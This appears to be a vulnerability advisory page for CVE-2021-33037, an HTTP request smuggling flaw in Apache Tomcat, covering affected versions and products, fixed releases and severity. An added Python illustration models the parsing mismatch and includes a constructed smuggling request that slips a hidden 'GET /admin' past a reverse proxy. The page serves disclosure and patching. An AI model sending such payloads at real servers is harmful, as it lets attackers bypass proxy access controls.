First published: Mon Jul 12 2021(Updated: )
Apache Tomcat 10.0.0-M1 to 10.0.6, 9.0.0.M1 to 9.0.46 and 8.5.0 to 8.5.66 did not correctly parse the HTTP Transfer-Encoding request header in some circumstances, leading to the possibility of request smuggling when Tomcat is used behind a reverse proxy. Specifically:
- Tomcat incorrectly ignored the Transfer-Encoding header if the client declared it would only accept an HTTP/1.0 response;
- Tomcat honoured the obsolete identity transfer coding; and
- Tomcat did not ensure that, if present, the chunked encoding was the final encoding.
Each of these lets a front-end proxy and Tomcat disagree about where one request ends and the next begins, so a request body accepted by the proxy can carry a second request that the proxy never inspected.
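The following is an added illustration, not Tomcat's code: it models a reverse proxy that frames requests by the RFC 7230 rules next to a back end with only the three pre-fix behaviours listed above, and shows how the same bytes are split into one request by the front end and two by the back end. The attack request, the host name `app.example` and the paths are constructed for the example; the proxy is assumed to forward the client's request line and headers unchanged.

```python
"""Framing disagreement behind CVE-2021-33037 (added example; not Tomcat's code).
'lenient' models only the three pre-fix behaviours named in the advisory;
'strict' follows RFC 7230 section 3.3.3. Bodies are framed, not decompressed."""
from typing import List, Optional, Tuple


class BadRequest(Exception):
    """Where a compliant parser would answer 400 and close the connection."""


def split_head(raw: bytes) -> Tuple[str, List[Tuple[str, str]], bytes]:
    """Return (HTTP version, [(name, value)], bytes after the header block)."""
    head, sep, rest = raw.partition(b"\r\n\r\n")
    if not sep:
        raise BadRequest("incomplete header block")
    lines = head.split(b"\r\n")
    version = lines[0].decode("ascii").split(" ")[-1]
    headers = []
    for line in lines[1:]:
        name, colon, value = line.partition(b":")
        if not colon:
            raise BadRequest("malformed header line")
        headers.append((name.strip().lower().decode("ascii"),
                        value.strip().decode("ascii")))
    return version, headers, rest


def transfer_codings(headers) -> List[str]:
    """All Transfer-Encoding values, lower-cased, in the order they appear."""
    codings: List[str] = []
    for name, value in headers:
        if name == "transfer-encoding":
            codings += [c.strip().lower() for c in value.split(",") if c.strip()]
    return codings


def content_length(headers) -> Optional[int]:
    """Single numeric Content-Length, None if absent, 400 if conflicting."""
    values = {value for name, value in headers if name == "content-length"}
    if not values:
        return None
    if len(values) > 1 or not all(v.isdigit() for v in values):
        raise BadRequest("invalid or conflicting Content-Length")
    return int(values.pop())


def read_chunked(data: bytes) -> Tuple[bytes, bytes]:
    """Decode a chunked body; returns (body, bytes left on the connection)."""
    body, pos = b"", 0
    while True:
        end = data.find(b"\r\n", pos)
        if end < 0:
            raise BadRequest("truncated chunk")
        try:
            size = int(data[pos:end].split(b";")[0], 16)  # chunk extensions ignored
        except ValueError:
            raise BadRequest("bad chunk size")
        pos = end + 2
        if size == 0:  # last chunk; trailers are not supported in this model
            if data[pos:pos + 2] != b"\r\n":
                raise BadRequest("missing terminating CRLF")
            return body, data[pos + 2:]
        if data[pos + size:pos + size + 2] != b"\r\n":
            raise BadRequest("chunk data not followed by CRLF")
        body += data[pos:pos + size]
        pos += size + 2


def frame_request(raw: bytes, lenient: bool = False) -> Tuple[bytes, bytes]:
    """Return (body, leftover bytes a server would read as the next request).
    lenient=True: 1) Transfer-Encoding ignored on an HTTP/1.0 request,
    2) 'identity' accepted as a no-op, 3) chunked honoured wherever it appears.
    lenient=False: chunked must be the final coding, 'identity' and any other
    list is a 400, and Content-Length is ignored when Transfer-Encoding is set."""
    version, headers, rest = split_head(raw)
    codings = transfer_codings(headers)
    length = content_length(headers)
    if lenient:
        if version == "HTTP/1.0":
            codings = []
        codings = [c for c in codings if c != "identity"]
        if "chunked" in codings:
            return read_chunked(rest)
    elif codings:
        if codings[-1] != "chunked" or "identity" in codings:
            raise BadRequest("chunked must be the final transfer coding")
        return read_chunked(rest)
    if length is None:
        return b"", rest
    if len(rest) < length:
        raise BadRequest("body shorter than Content-Length")
    return rest[:length], rest[length:]


def rejects(raw: bytes, lenient: bool = False) -> bool:
    """True if the chosen parser refuses the request with a 400."""
    try:
        frame_request(raw, lenient)
        return False
    except BadRequest:
        return True


def desync(raw: bytes) -> Tuple[bytes, bytes, bytes]:
    """Frame the same bytes as the strict front end and the lenient back end.
    Returns (front_end_body, back_end_body, back_end_leftover); a leftover the
    front end never saw as a request is the smuggled request."""
    front_body, _ = frame_request(raw, lenient=False)
    back_body, back_left = frame_request(raw, lenient=True)
    return front_body, back_body, back_left


# Constructed attack request (not a captured sample). HTTP/1.0 in the request
# line makes the lenient back end fall back to Content-Length: 4, which covers
# only the chunk-size line "2a\r\n"; the rest is parsed as a second request.
# The strict front end reads the chunked body to the zero chunk as one request.
SMUGGLED = b"GET /admin HTTP/1.1\r\nHost: app.example\r\n\r\n"
ATTACK = (
    b"POST /upload HTTP/1.0\r\n"
    b"Host: app.example\r\n"
    b"Content-Length: 4\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n"
    + b"%x\r\n%s\r\n0\r\n\r\n" % (len(SMUGGLED), SMUGGLED)
)

if __name__ == "__main__":
    front, back, leftover = desync(ATTACK)
    print("front end body:", front)
    print("back end body :", back)
    print("smuggled line :", leftover.split(b"\r\n")[0])
```

Run as-is to see the split; the same request framed with `lenient=False` on both sides yields one request and no leftover, which is the post-fix behaviour. The `rejects` helper shows the other two bullets: `Transfer-Encoding: identity` and `Transfer-Encoding: chunked, identity` are both 400s under the strict rules but are framed by Content-Length or by chunked, respectively, under the lenient ones.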
Credit: security@apache.org
Affected Software | Affected Version | How to fix |
---|---|---|
redhat/jws5-tomcat | <0:9.0.50-3.redhat_00004.1.el7 | 0:9.0.50-3.redhat_00004.1.el7 |
redhat/jws5-tomcat-native | <0:1.2.30-3.redhat_3.el7 | 0:1.2.30-3.redhat_3.el7 |
redhat/jws5-tomcat-vault | <0:1.1.8-4.Final_redhat_00004.1.el7 | 0:1.1.8-4.Final_redhat_00004.1.el7 |
redhat/jws5-tomcat | <0:9.0.50-3.redhat_00004.1.el8 | 0:9.0.50-3.redhat_00004.1.el8 |
redhat/jws5-tomcat-native | <0:1.2.30-3.redhat_3.el8 | 0:1.2.30-3.redhat_3.el8 |
redhat/jws5-tomcat-vault | <0:1.1.8-4.Final_redhat_00004.1.el8 | 0:1.1.8-4.Final_redhat_00004.1.el8 |
redhat/tomcat | <10.0.7 | 10.0.7 |
redhat/tomcat | <9.0.48 | 9.0.48 |
redhat/tomcat | <8.5.68 | 8.5.68 |
maven/org.apache.tomcat:tomcat | >=8.5.0<8.5.68 | 8.5.68 |
maven/org.apache.tomcat:tomcat | >=9.0.0-M1<9.0.48 | 9.0.48 |
maven/org.apache.tomcat:tomcat | >=10.0.0-M1<10.0.7 | 10.0.7 |
Apache Tomcat | >=8.5.0<=8.5.66 | |
Apache Tomcat | >=9.0.0-M1<=9.0.46 | |
Apache Tomcat | >=10.0.0-M1<=10.0.6 | |
Apache TomEE | =8.0.6 | |
Debian Debian Linux | =9.0 | |
Debian Debian Linux | =10.0 | |
Oracle Agile PLM | =9.3.6 | |
Oracle Communications Cloud Native Core Policy | =1.14.0 | |
Oracle Communications Cloud Native Core Service Communication Proxy | =1.14.0 | |
Oracle Communications Diameter Signaling Router | >=8.0.0.0<=8.5.0.2 | |
Oracle Communications Instant Messaging Server | =10.0.1.5.0 | |
Oracle Communications Policy Management | =12.5.0 | |
Oracle Communications Pricing Design Center | =12.0.0.3.0 | |
Oracle Communications Session Report Manager | >=8.0.0<=8.2.4.0 | |
Oracle Communications Session Route Manager | >=8.0.0<=8.2.4 | |
Oracle Graph Server And Client | <21.4 | |
Oracle Healthcare Translational Research | =4.1.0 | |
Oracle Hospitality Cruise Shipboard Property Management System | =20.1.0 | |
Oracle Instantis Enterprisetrack | =17.1 | |
Oracle Instantis Enterprisetrack | =17.2 | |
Oracle Instantis Enterprisetrack | =17.3 | |
Oracle Managed File Transfer | =12.2.1.3.0 | |
Oracle Managed File Transfer | =12.2.1.4.0 | |
Oracle Mysql Enterprise Monitor | <=8.0.25 | |
Oracle SD-WAN Edge | =9.0 | |
Oracle SD-WAN Edge | =9.1 | |
Oracle Secure Global Desktop | =5.6 | |
Oracle Utilities Testing Accelerator | =6.0.0.1.1 | |
Oracle Utilities Testing Accelerator | =6.0.0.2.2 | |
Oracle Utilities Testing Accelerator | =6.0.0.3.1 | |
McAfee ePolicy Orchestrator | <5.10.0 | |
McAfee ePolicy Orchestrator | =5.10.0 | |
McAfee ePolicy Orchestrator | =5.10.0-update_1 | |
McAfee ePolicy Orchestrator | =5.10.0-update_10 | |
McAfee ePolicy Orchestrator | =5.10.0-update_2 | |
McAfee ePolicy Orchestrator | =5.10.0-update_3 | |
McAfee ePolicy Orchestrator | =5.10.0-update_4 | |
McAfee ePolicy Orchestrator | =5.10.0-update_5 | |
McAfee ePolicy Orchestrator | =5.10.0-update_6 | |
McAfee ePolicy Orchestrator | =5.10.0-update_7 | |
McAfee ePolicy Orchestrator | =5.10.0-update_8 | |
McAfee ePolicy Orchestrator | =5.10.0-update_9 | |
IBM DRM | <=2.0.6 | |
debian/tomcat9 | | 9.0.43-2~deb11u10, 9.0.70-2, 9.0.95-1 |
The severity of CVE-2021-33037 is medium with a CVSS score of 4.3.
CVE-2021-33037 affects Apache Tomcat versions 10.0.0-M1 to 10.0.6, 9.0.0.M1 to 9.0.46, and 8.5.0 to 8.5.66.
The remedy for CVE-2021-33037 is to upgrade Apache Tomcat to version 10.0.7, 9.0.48, or 8.5.68.
You can find more information about CVE-2021-33037 at the following references: [CVE-2021-33037 at CVE.org](https://www.cve.org/CVERecord?id=CVE-2021-33037) and [CVE-2021-33037 at NIST](https://nvd.nist.gov/vuln/detail/CVE-2021-33037).
The CWE for CVE-2021-33037 is CWE-444 (Inconsistent Interpretation of HTTP Requests, i.e. HTTP Request/Response Smuggling).